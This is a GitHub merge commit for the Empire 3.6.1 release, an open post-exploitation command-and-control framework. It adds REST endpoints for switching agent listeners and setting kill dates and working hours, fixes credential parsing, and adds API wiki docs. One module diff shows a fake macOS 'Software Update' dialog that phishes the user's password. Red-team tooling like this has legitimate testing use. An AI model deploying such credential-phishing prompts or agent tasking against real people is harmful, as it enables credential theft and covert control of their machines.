Merge pull request #400 from BC-SECURITY/dev

Empire 3.6.1 Release
BC-SECURITY · Nov 16, 2020 · 813c70e · 813c70e
2 parents 266d4a4 + d5ba70d
commit 813c70e
Show file tree

Hide file tree

Showing 40 changed files with 1,962 additions and 8 deletions.
diff --git a/.github/workflows/wikisync.yml b/.github/workflows/wikisync.yml
@@ -0,0 +1,20 @@
+on:
+    push:
+        branches:
+            - master
+    pull_request:
+        branches:
+            - master
+name: Wiki Sync
+jobs:
+    update-wiki:
+        runs-on: ubuntu-latest
+        steps:
+          - uses: actions/checkout@master
+          - name: Sync Wiki
+            uses: joeizzard/action-wiki-sync@master
+            with:
+                username: Cx01N
+                access_token: ${{ secrets.GITHUB_TOKEN }}
+                wiki_folder: wiki
+                commit_username: 'Cx01N'
diff --git a/README.md b/README.md
@@ -96,6 +96,12 @@ Plugins are an extension of Empire that allow for custom scripts to be loaded. T
 community projects to extend Empire functionality. Plugins can be accessed from the Empire CLI or the API as long as the 
 plugin follows the [template example](./plugins/example.py). A list of Empire Plugins is located [here](plugins/PLUGINS.md).
 
+## Official Discord Channel
+<p align="center">
+<a href="https://discord.gg/P8PZPyf">
+<img src="https://discordapp.com/api/guilds/716165691383873536/widget.png?style=banner3"/>
+</p>
+
 ## Contribution Rules
 
 Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.

diff --git a/VERSION b/VERSION
@@ -1 +1 @@
-3.6.0
+3.6.1
diff --git a/changelog b/changelog
@@ -1,3 +1,11 @@
+11/16/2020
+------------
+- Version 3.6.1 Master Release
+        - Added editable wiki and sync option to repo - #398 (@Cx01N)
+        - Fixed byte error in python/collection/osx/prompt - #396 (@Cx01N)
+        - Fixed clear option issue for malleable listener - #393 (@Cx01N)
+        - Added update_comms, killdate, and workinghours endpoints (@Cx01N)
+
 11/9/2020
 ------------
 - Version 3.6.0 Master Release

diff --git a/empire b/empire
@@ -1081,12 +1081,106 @@ def start_restful_api(empireMenu: MainMenu, suppress=False, username=None, passw
             taskID = main.agents.add_agent_task_db(agentSessionID, "TASK_SHELL", command, uid=g.user['id'])
         return jsonify({'success': True, 'taskID': taskID})
 
+    @app.route('/api/agents/<string:agent_name>/update_comms', methods=['PUT'])
+    def agent_update_comms(agent_name):
+        """
+        Dynamically update the agent comms to another
+
+        Takes {'listener': 'name'}
+        """
+
+        if not request.json:
+            return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
+
+        if not 'listener' in request.json:
+            return make_response(jsonify({'error':'JSON body must include key "listener"'}), 400)
+
+        listener_name = request.json['listener']
+
+        if not main.listeners.is_listener_valid(listener_name):
+            return jsonify({'error': 'Please enter a valid listener name.'})
+        else:
+            active_listener = main.listeners.activeListeners[listener_name]
+            if active_listener['moduleName'] != 'meterpreter' or active_listener['moduleName'] != 'http_mapi':
+                listener_options = active_listener['options']
+                listener_comms = main.listeners.loadedListeners[active_listener['moduleName']].generate_comms(listener_options, language="powershell")
+
+                main.agents.add_agent_task_db(agent_name, "TASK_UPDATE_LISTENERNAME", listener_options['Name']['Value'])
+                main.agents.add_agent_task_db(agent_name, "TASK_SWITCH_LISTENER", listener_comms)
+
+                msg = "Tasked agent to update comms to %s listener" % listener_name
+                main.agents.save_agent_log(agent_name, msg)
+                return jsonify({'success': True})
+            else:
+                return jsonify({'error': 'Ineligible listener for updatecomms command: %s' % active_listener['moduleName']})
+
+    @app.route('/api/agents/<string:agent_name>/killdate', methods=['PUT'])
+    def agent_kill_date(agent_name):
+        """
+        Set an agent's killdate (01/01/2016)
+
+        Takes {'kill_date': 'date'}
+        """
+
+        if not request.json:
+            return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
+
+        if not 'kill_date' in request.json:
+            return make_response(jsonify({'error':'JSON body must include key "kill_date"'}), 400)
+
+        try:
+            kill_date = request.json['kill_date']
+
+            # update this agent's information in the database
+            main.agents.set_agent_field_db("kill_date", kill_date, agent_name)
+
+            # task the agent
+            main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-KillDate " + str(kill_date))
+
+            # update the agent log
+            msg = "Tasked agent to set killdate to " + str(kill_date)
+            main.agents.save_agent_log(agent_name, msg)
+            return jsonify({'success': True})
+        except:
+            return jsonify({'error': 'Unable to update agent killdate'})
+
+    @app.route('/api/agents/<string:agent_name>/workinghours', methods=['PUT'])
+    def agent_working_hours(agent_name):
+        """
+        Set an agent's working hours (9:00-17:00)
+
+        Takes {'working_hours': 'working_hours'}
+        """
+
+        if not request.json:
+            return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
+
+        if not 'working_hours' in request.json:
+            return make_response(jsonify({'error':'JSON body must include key "working_hours"'}), 400)
+
+        try:
+            working_hours = request.json['working_hours']
+            working_hours = working_hours.replace(",", "-")
+
+            # update this agent's information in the database
+            main.agents.set_agent_field_db("working_hours", working_hours, agent_name)
+
+            # task the agent
+            main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-WorkingHours " + str(working_hours))
+
+            # update the agent log
+            msg = "Tasked agent to set working hours to " + str(working_hours)
+            main.agents.save_agent_log(agent_name, msg)
+            return jsonify({'success': True})
+        except:
+            return jsonify({'error': 'Unable to update agent workinghours'})
+
     @app.route('/api/agents/<string:agent_name>/rename', methods=['POST'])
     def task_agent_rename(agent_name):
         """
         Renames the specified agent.
 
-        Takes {'newname':'NAME'}
+        Takes {'newname': 'NAME'}
         """
 
         agentNameID = execute_db_query(conn, 'SELECT name,session_id FROM agents WHERE name like ? OR session_id like ?', [agent_name, agent_name])
@@ -1164,7 +1258,7 @@ def start_restful_api(empireMenu: MainMenu, suppress=False, username=None, passw
             return make_response(jsonify({'error':'request body must be valid JSON'}), 400)
 
         if not 'notes' in request.json:
-            return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400)
+            return make_response(jsonify({'error':'JSON body must include key "notes"'}), 400)
 
         notes = request.json['notes']
 

diff --git a/lib/common/empire.py b/lib/common/empire.py
@@ -18,7 +18,7 @@
 
 from flask_socketio import SocketIO
 
-VERSION = "3.6.0 BC Security Fork"
+VERSION = "3.6.1 BC Security Fork"
 
 from pydispatch import dispatcher
 

diff --git a/lib/common/helpers.py b/lib/common/helpers.py
@@ -457,7 +457,7 @@ def parse_credentials(data):
 
     # python/collection/prompt (Mac OS)
     elif b"text returned:" in parts[0]:
-        parts2 = parts[0].split("text returned:")
+        parts2 = parts[0].split(b"text returned:")
         if len(parts2) >= 2:
             password = parts2[-1]
             return [("plaintext", "", "", password, "", "")]

diff --git a/lib/common/listeners.py b/lib/common/listeners.py
@@ -259,7 +259,8 @@ def start_listener(self, moduleName, listenerObject):
                 self.activeListeners[name]['name'] = name
 
                 # TODO: listeners should not have their default options rewritten in memory after generation
-                self.default_listener_options(moduleName)
+                if moduleName == 'redirector':
+                    self.default_listener_options(moduleName)
 
                 if self.mainMenu.socketio:
                     self.mainMenu.socketio.emit('listeners/new', self.get_listener_for_socket(name), broadcast=True)

diff --git a/lib/modules/python/collection/osx/prompt.py b/lib/modules/python/collection/osx/prompt.py
@@ -109,7 +109,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
                 # osascript prompt for the current application with System Preferences icon
                 script = """
 import os
-print(os.popen('osascript -e \\\'display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon file "Applications:System Preferences.app:Contents:Resources:PrefApp.icns" with hidden answer with title "Software Update"\\\'').read())
+print(os.popen('osascript -e \\\'display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with hidden answer with title "Software Update"\\\'').read())
 """
 
             else:

diff --git a/plugins/example.py b/plugins/example.py
@@ -87,7 +87,6 @@ def register(self, mainMenu):
     def do_test(self, args):
         """
         An example of a plugin function.
-
         Usage: test <start|stop> <message>
         """
         print("This is executed from a plugin!")
@@ -116,3 +115,4 @@ def shutdown(self):
         """
         # If the plugin spawns a process provide a shutdown method for when Empire exits else leave it as pass
         pass
+
diff --git a/wiki/Admin-Functionality.md b/wiki/Admin-Functionality.md
@@ -0,0 +1,90 @@
+* [User Login](#User-Login)
+* [User Logout](#User-Logout)
+* [Restart the RESTful API Server](#restart-the-restful-api-server)
+* [Shutdown the RESTful API Server](#shutdown-the-restful-api-server)
+
+## User Login
+
+### Handler
+
+* **Handler** : POST /api/admin/login
+* Description : Retrieves the API token given the correct username and password.
+* No parameters
+
+### Example
+
+**Request**:
+```bash
+curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
+```
+
+**Response**:
+```json
+{
+  "token": "ks23jlvdki4fj1j23w39h0h0xcuwjrqilocxd6b5"
+}
+```
+## User Logout
+
+### Handler
+
+* **Handler** : POST /api/admin/logout
+* Description : Logs out of current user account.
+* No parameters
+
+### Example
+
+**Request**:
+```bash
+curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/logout -X POST
+```
+
+**Response**:
+```json
+{
+  "success": "True"
+}
+```
+## Restart the RESTful API Server
+
+### Handler
+
+* **Handler** : GET /api/restart
+* Description : Restarts the RESTful API server.
+* No parameters
+
+### Example
+
+**Request**:
+```bash
+curl --insecure -i https://localhost:1337/api/admin/restart?token=ks23jlvdki4fj1j23w39h0h0xcuwjrqilocxd6b5
+```
+
+**Response**:
+```json
+{
+  "success": true
+}
+```
+
+## Shutdown the RESTful API Server
+
+### Handler
+
+* **Handler** : GET /api/shutdown
+* Description : Shutdown the RESTful API server.
+* No parameters
+
+### Example
+
+**Request**:
+```bash
+curl --insecure -i https://localhost:1337/api/admin/shutdown?token=ks23jlvdki4fj1j23w39h0h0xcuwjrqilocxd6b5
+```
+
+**Response**:
+```json
+{
+  "success": true
+}
+```